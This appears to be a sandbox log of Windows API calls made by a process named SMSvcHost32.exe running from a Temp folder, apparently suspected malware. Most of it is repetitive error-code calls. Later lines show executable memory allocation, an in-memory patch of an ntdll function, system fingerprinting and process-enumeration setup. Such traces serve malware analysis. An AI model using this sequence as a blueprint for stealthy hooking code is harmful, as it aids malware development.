	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.163] GetLastError () returned 0x0
	[0096.163] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.164] SetLastError (dwErrCode=0x0) 
	[0096.164] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.165] SetLastError (dwErrCode=0x0) 
	[0096.165] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.166] GetLastError () returned 0x0
	[0096.166] SetLastError (dwErrCode=0x0) 
	[0096.167] GetLastError () returned 0x0
	[0096.167] SetLastError (dwErrCode=0x0) 
	[0096.167] GetLastError () returned 0x0
	[0096.167] SetLastError (dwErrCode=0x0) 
	[0096.167] GetLastError () returned 0x0
	[0096.167] SetLastError (dwErrCode=0x0) 
	[0096.167] GetLastError () returned 0x0
	[0096.167] SetLastError (dwErrCode=0x0) 
	[0096.167] GetLastError () returned 0x0
	[0096.167] SetLastError (dwErrCode=0x0) 
	[0096.167] GetLastError () returned 0x0
	[0096.167] SetLastError (dwErrCode=0x0) 
	[0096.167] GetLastError () returned 0x0
	[0096.167] SetLastError (dwErrCode=0x0) 
	[0096.167] GetLastError () returned 0x0
	[0096.167] SetLastError (dwErrCode=0x0) 
	[0096.168] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0096.168] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0096.169] GetLastError () returned 0x0
	[0096.169] SetLastError (dwErrCode=0x0) 
	[0096.169] GetLastError () returned 0x0
	[0096.170] SetLastError (dwErrCode=0x0) 
	[0096.170] GetLastError () returned 0x0
	[0096.170] SetLastError (dwErrCode=0x0) 
	[0096.170] GetLastError () returned 0x0
	[0096.170] SetLastError (dwErrCode=0x0) 
	[0096.171] DisableThreadLibraryCalls (hLibModule=0x3f40000) returned 0
	[0096.171] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0096.171] GetProcAddress (hModule=0x77960000, lpProcName="RtlPcToFileHeader") returned 0x779b5100
	[0096.172] GetCurrentThreadId () returned 0xc24
	[0096.172] GetCurrentThread () returned 0xfffffffe
	[0096.172] GetCurrentThread () returned 0xfffffffe
	[0096.172] GetCurrentThreadId () returned 0xc24
	[0096.172] VirtualQuery (in: lpAddress=0x6fff0000, lpBuffer=0x20afbd0, dwLength=0x1c | out: lpBuffer=0x20afbd0*(BaseAddress=0x6fff0000, AllocationBase=0x6fff0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0096.172] VirtualQuery (in: lpAddress=0x6ffe0000, lpBuffer=0x20afbd0, dwLength=0x1c | out: lpBuffer=0x20afbd0*(BaseAddress=0x6ffe0000, AllocationBase=0x6ffa0000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0096.172] VirtualQuery (in: lpAddress=0x6ff90000, lpBuffer=0x20afbd0, dwLength=0x1c | out: lpBuffer=0x20afbd0*(BaseAddress=0x6ff90000, AllocationBase=0x6ff90000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0096.172] VirtualQuery (in: lpAddress=0x6ff80000, lpBuffer=0x20afbd0, dwLength=0x1c | out: lpBuffer=0x20afbd0*(BaseAddress=0x6ff80000, AllocationBase=0x6ff70000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c
	[0096.172] VirtualQuery (in: lpAddress=0x6ff60000, lpBuffer=0x20afbd0, dwLength=0x1c | out: lpBuffer=0x20afbd0*(BaseAddress=0x6ff60000, AllocationBase=0x6ff60000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0096.172] VirtualQuery (in: lpAddress=0x6ff50000, lpBuffer=0x20afbd0, dwLength=0x1c | out: lpBuffer=0x20afbd0*(BaseAddress=0x6ff50000, AllocationBase=0x6ff40000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c
	[0096.172] VirtualQuery (in: lpAddress=0x6ff30000, lpBuffer=0x20afbd0, dwLength=0x1c | out: lpBuffer=0x20afbd0*(BaseAddress=0x6ff30000, AllocationBase=0x6ff20000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0096.172] VirtualQuery (in: lpAddress=0x6ff10000, lpBuffer=0x20afbd0, dwLength=0x1c | out: lpBuffer=0x20afbd0*(BaseAddress=0x6ff10000, AllocationBase=0x6ff10000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0096.172] VirtualQuery (in: lpAddress=0x6ff00000, lpBuffer=0x20afbd0, dwLength=0x1c | out: lpBuffer=0x20afbd0*(BaseAddress=0x6ff00000, AllocationBase=0x6fee0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0096.172] VirtualQuery (in: lpAddress=0x6fed0000, lpBuffer=0x20afbd0, dwLength=0x1c | out: lpBuffer=0x20afbd0*(BaseAddress=0x6fed0000, AllocationBase=0x6feb0000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0096.172] VirtualQuery (in: lpAddress=0x6fea0000, lpBuffer=0x20afbd0, dwLength=0x1c | out: lpBuffer=0x20afbd0*(BaseAddress=0x6fea0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c
	[0096.201] VirtualAlloc (lpAddress=0x6fea0000, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x40) returned 0x6fea0000
	[0096.203] VirtualProtect (in: lpAddress=0x779b5100, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x20afc48 | out: lpflOldProtect=0x20afc48*=0x20) returned 1
	[0096.203] GetCurrentThreadId () returned 0xc24
	[0096.203] GetCurrentProcess () returned 0xffffffff
	[0096.203] VirtualProtect (in: lpAddress=0x779b5100, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x20af9a4 | out: lpflOldProtect=0x20af9a4*=0x40) returned 1
	[0096.203] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x779b5100, dwSize=0x5) returned 1
	[0096.203] GetCurrentProcess () returned 0xffffffff
	[0096.203] VirtualProtect (in: lpAddress=0x6fea0000, dwSize=0x10000, flNewProtect=0x20, lpflOldProtect=0x20af990 | out: lpflOldProtect=0x20af990*=0x40) returned 1
	[0096.203] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6fea0000, dwSize=0x10000) returned 1
	[0096.203] GetCommandLineA () returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz"
	[0096.203] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3f98b0c) returned 0x0
	[0096.204] GetCurrentProcess () returned 0xffffffff
	[0096.204] SetProcessWorkingSetSize (hProcess=0xffffffff, dwMinimumWorkingSetSize=0xffffffff, dwMaximumWorkingSetSize=0xffffffff) returned 1
	[0096.383] GetCurrentProcessId () returned 0xdd4
	[0096.383] GetLastError () returned 0x7e
	[0096.383] SetLastError (dwErrCode=0x7e) 
	[0096.383] GetLastError () returned 0x7e
	[0096.384] SetLastError (dwErrCode=0x7e) 
	[0096.384] OutputDebugStringA (lpOutputString="3540:C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz Ignition....\n") 
	[0096.385] GetLastError () returned 0x7e
	[0096.385] SetLastError (dwErrCode=0x7e) 
	[0096.385] GetLastError () returned 0x7e
	[0096.385] SetLastError (dwErrCode=0x7e) 
	[0096.386] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x358
	[0096.386] GetSystemInfo (in: lpSystemInfo=0x20afac0 | out: lpSystemInfo=0x20afac0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0096.386] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x870000
	[0096.387] VirtualProtect (in: lpAddress=0x870000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x20afad4 | out: lpflOldProtect=0x20afad4*=0x40) returned 1
	[0096.387] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2130000
	[0096.387] VirtualProtect (in: lpAddress=0x2130000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x20afb64 | out: lpflOldProtect=0x20afb64*=0x40) returned 1
	[0096.388] GetLastError () returned 0x0
	[0096.388] SetLastError (dwErrCode=0x0) 
	[0096.388] GetLastError () returned 0x0
	[0096.388] SetLastError (dwErrCode=0x0) 
	[0096.388] GetLastError () returned 0x0
	[0096.388] SetLastError (dwErrCode=0x0) 
	[0096.389] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x384
	[0096.389] SetErrorMode (uMode=0x8003) returned 0x2
	[0096.389] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0096.390] GetProcAddress (hModule=0x77960000, lpProcName="RtlNtStatusToDosError") returned 0x779b83c0
	[0096.390] GetProcAddress (hModule=0x77960000, lpProcName="NtDeviceIoControlFile") returned 0x779d6cf0
	[0096.390] GetProcAddress (hModule=0x77960000, lpProcName="NtQueryInformationFile") returned 0x779d6d90
	[0096.391] GetProcAddress (hModule=0x77960000, lpProcName="NtSetInformationFile") returned 0x779d6f10
	[0096.391] GetProcAddress (hModule=0x77960000, lpProcName="NtQueryVolumeInformationFile") returned 0x779d7130
	[0096.391] GetProcAddress (hModule=0x77960000, lpProcName="NtQueryDirectoryFile") returned 0x779d6ff0
	[0096.391] GetProcAddress (hModule=0x77960000, lpProcName="NtQuerySystemInformation") returned 0x779d7000
	[0096.391] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.391] GetProcAddress (hModule=0x765a0000, lpProcName="GetQueuedCompletionStatusEx") returned 0x765e10f0
	[0096.392] GetProcAddress (hModule=0x765a0000, lpProcName="SetFileCompletionNotificationModes") returned 0x765b9dd0
	[0096.392] GetProcAddress (hModule=0x765a0000, lpProcName="CreateSymbolicLinkW") returned 0x765e0830
	[0096.392] GetProcAddress (hModule=0x765a0000, lpProcName="CancelIoEx") returned 0x765bf450
	[0096.393] GetProcAddress (hModule=0x765a0000, lpProcName="InitializeConditionVariable") returned 0x77986710
	[0096.393] GetProcAddress (hModule=0x765a0000, lpProcName="SleepConditionVariableCS") returned 0x775f7f60
	[0096.393] GetProcAddress (hModule=0x765a0000, lpProcName="SleepConditionVariableSRW") returned 0x775f7fb0
	[0096.394] GetProcAddress (hModule=0x765a0000, lpProcName="WakeAllConditionVariable") returned 0x779c8d70
	[0096.394] GetProcAddress (hModule=0x765a0000, lpProcName="WakeConditionVariable") returned 0x779cc720
	[0096.394] GetProcAddress (hModule=0x765a0000, lpProcName="CancelSynchronousIo") returned 0x765e05a0
	[0096.394] GetProcAddress (hModule=0x765a0000, lpProcName="GetFinalPathNameByHandleW") returned 0x765c6ac0
	[0096.394] LoadLibraryA (lpLibFileName="powrprof.dll") returned 0x74770000
	[0096.395] GetProcAddress (hModule=0x74770000, lpProcName="PowerRegisterSuspendResumeNotification") returned 0x74775ea0
	[0096.395] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77810000
	[0096.395] GetProcAddress (hModule=0x77810000, lpProcName="SetWinEventHook") returned 0x7782fc00
	[0096.395] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x20afa60 | out: lpWSAData=0x20afa60) returned 0
	[0096.395] htons (hostshort=0x0) returned 0x0
	[0096.396] htons (hostshort=0x0) returned 0x0
	[0096.396] socket (af=2, type=1, protocol=0) returned 0x390
	[0096.397] getsockopt (in: s=0x390, level=65535, optname=8197, optval=0x20af7e8, optlen=0x20af7e4 | out: optval="f", optlen=0x20af7e4) returned 0
	[0096.405] closesocket (s=0x390) returned 0
	[0096.405] socket (af=23, type=1, protocol=0) returned 0x390
	[0096.429] getsockopt (in: s=0x390, level=65535, optname=8197, optval=0x20af7e8, optlen=0x20af7e4 | out: optval="f", optlen=0x20af7e4) returned 0
	[0096.429] closesocket (s=0x390) returned 0
	[0096.429] SetConsoleCtrlHandler (HandlerRoutine=0x40234a0, Add=1) returned 1
	[0096.429] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x390
	[0096.429] CreateFileW (lpFileName="CONOUT$" (normalized: "\\device\\condrv\\currentout"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0096.430] QueueUserWorkItem (Function=0x40394f0, Context=0x0, Flags=0x10) returned 1
	[0096.430] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0096.430] QueryPerformanceFrequency (in: lpFrequency=0x20afc08 | out: lpFrequency=0x20afc08) returned 1
	[0096.430] PowerRegisterSuspendResumeNotification (in: Flags=0x2, Recipient=0x20afc10, RegistrationHandle=0x20afc04 | out: RegistrationHandle=0x20afc04) returned 0x0
	[0096.430] SetEvent (hEvent=0x384) returned 1
	[0096.430] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x1) returned 0x398
	[0096.430] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc20 | out: lpPerformanceCount=0x20afc20*=1817893700000) returned 1
	[0096.431] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0096.431] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0096.431] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0096.431] GetStartupInfoW (in: lpStartupInfo=0x20afc08 | out: lpStartupInfo=0x20afc08*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x401e064, hStdOutput=0x44a7a48, hStdError=0x3f9ed2e)) 
	[0096.431] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x39c
	[0096.431] InterlockedExchangeAdd (in: Addend=0x44a3a38, Value=1 | out: Addend=0x44a3a38) returned 0
	[0096.432] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x3a0
	[0096.432] InterlockedExchangeAdd (in: Addend=0x44a3a3c, Value=1 | out: Addend=0x44a3a3c) returned 0
	[0096.432] GetSystemInfo (in: lpSystemInfo=0x20afbac | out: lpSystemInfo=0x20afbac*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0096.433] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x3a4
	[0096.434] GetCurrentThreadId () returned 0xc24
	[0096.434] OpenThread (dwDesiredAccess=0x4a, bInheritHandle=0, dwThreadId=0xc24) returned 0x3a8
	[0096.434] GetSystemInfo (in: lpSystemInfo=0x20afb44 | out: lpSystemInfo=0x20afb44*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0096.434] GetCurrentThreadId () returned 0xc24
	[0096.434] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x74aa0000
	[0096.435] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x765a0000
	[0096.435] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x77490000
	[0096.435] GetProcAddress (hModule=0x77490000, lpProcName="NetStatisticsGet") returned 0x77492a40
	[0096.435] GetProcAddress (hModule=0x77490000, lpProcName="NetApiBufferFree") returned 0x6ff916d0
	[0096.435] NetStatisticsGet (in: ServerName=0x0, Service=0x43cdaa8, Level=0x0, Options=0x0, Buffer=0x20af6c8 | out: Buffer=0x20af6c8) returned 0x0
	[0096.449] GetCurrentThreadId () returned 0xc24
	[0096.449] NetApiBufferFree (Buffer=0x25ad778) returned 0x0
	[0096.449] NetStatisticsGet (in: ServerName=0x0, Service=0x43cda8c, Level=0x0, Options=0x0, Buffer=0x20af6c8 | out: Buffer=0x20af6c8) returned 0x0
	[0096.453] GetCurrentThreadId () returned 0xc24
	[0096.453] NetApiBufferFree (Buffer=0x25a2470) returned 0x0
	[0096.453] FreeLibrary (hLibModule=0x77490000) returned 1
	[0096.453] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptAcquireContextW") returned 0x74ac0590
	[0096.453] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptGenRandom") returned 0x74ac10a0
	[0096.453] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptReleaseContext") returned 0x74ac0650
	[0096.454] CryptAcquireContextW (in: phProv=0x20af6ac, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x20af6ac*=0x25af560) returned 1
	[0096.459] CryptGenRandom (in: hProv=0x25af560, dwLen=0x40, pbBuffer=0x20afa70 | out: pbBuffer=0x20afa70) returned 1
	[0096.459] GetCurrentThreadId () returned 0xc24
	[0096.459] CryptReleaseContext (hProv=0x25af560, dwFlags=0x0) returned 1
	[0096.459] CryptAcquireContextW (in: phProv=0x20af6ac, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x20af6ac*=0x25af560) returned 0
	[0096.459] FreeLibrary (hLibModule=0x74aa0000) returned 1
	[0096.459] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0096.459] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0
	[0096.459] GetProcessWindowStation () returned 0x84
	[0096.460] GetUserObjectInformationW (in: hObj=0x84, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x20af638 | out: pvInfo=0x0, lpnLengthNeeded=0x20af638) returned 0
	[0096.460] GetLastError () returned 0x7a
	[0096.460] GetUserObjectInformationW (in: hObj=0x84, nIndex=2, pvInfo=0x20af610, nLength=0x10, lpnLengthNeeded=0x20af638 | out: pvInfo=0x20af610, lpnLengthNeeded=0x20af638) returned 1
	[0096.460] wcsstr (_Str="WinSta0", _SubStr="Service-0x") returned 0x0
	[0096.460] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77810000
	[0096.460] GetProcAddress (hModule=0x77810000, lpProcName="GetForegroundWindow") returned 0x77848cb0
	[0096.461] GetProcAddress (hModule=0x77810000, lpProcName="GetCursorInfo") returned 0x7784c160
	[0096.461] GetProcAddress (hModule=0x77810000, lpProcName="GetQueueStatus") returned 0x7782e1b0
	[0096.461] GetForegroundWindow () returned 0x1008c
	[0096.461] GetCurrentThreadId () returned 0xc24
	[0096.461] GetCursorInfo (in: pci=0x20afa5c | out: pci=0x20afa5c) returned 1
	[0096.461] GetQueueStatus (flags=0xbf) returned 0x0
	[0096.461] GetCurrentThreadId () returned 0xc24
	[0096.461] FreeLibrary (hLibModule=0x77810000) returned 1
	[0096.461] GetProcAddress (hModule=0x765a0000, lpProcName="CreateToolhelp32Snapshot") returned 0x765c7b50
	[0096.462] GetProcAddress (hModule=0x765a0000, lpProcName="CloseToolhelp32Snapshot") returned 0x0
	[0096.462] GetProcAddress (hModule=0x765a0000, lpProcName="Heap32First") returned 0x765e3f00
	[0096.462] GetProcAddress (hModule=0x765a0000, lpProcName="Heap32Next") returned 0x765e4270
	[0096.462] GetProcAddress (hModule=0x765a0000, lpProcName="Heap32ListFirst") returned 0x765e4120
	[0096.462] GetProcAddress (hModule=0x765a0000, lpProcName="Heap32ListNext") returned 0x765e41d0
	[0096.463] GetProcAddress (hModule=0x765a0000, lpProcName="Process32First") returned 0x765bf4d0
	[0096.463] GetProcAddress (hModule=0x765a0000, lpProcName="Process32Next") returned 0x765bd1c0
	[0096.463] GetProcAddress (hModule=0x765a0000, lpProcName="Thread32First") returned 0x765c5c50
	[0096.463] GetProcAddress (hModule=0x765a0000, lpProcName="Thread32Next") returned 0x765c5150
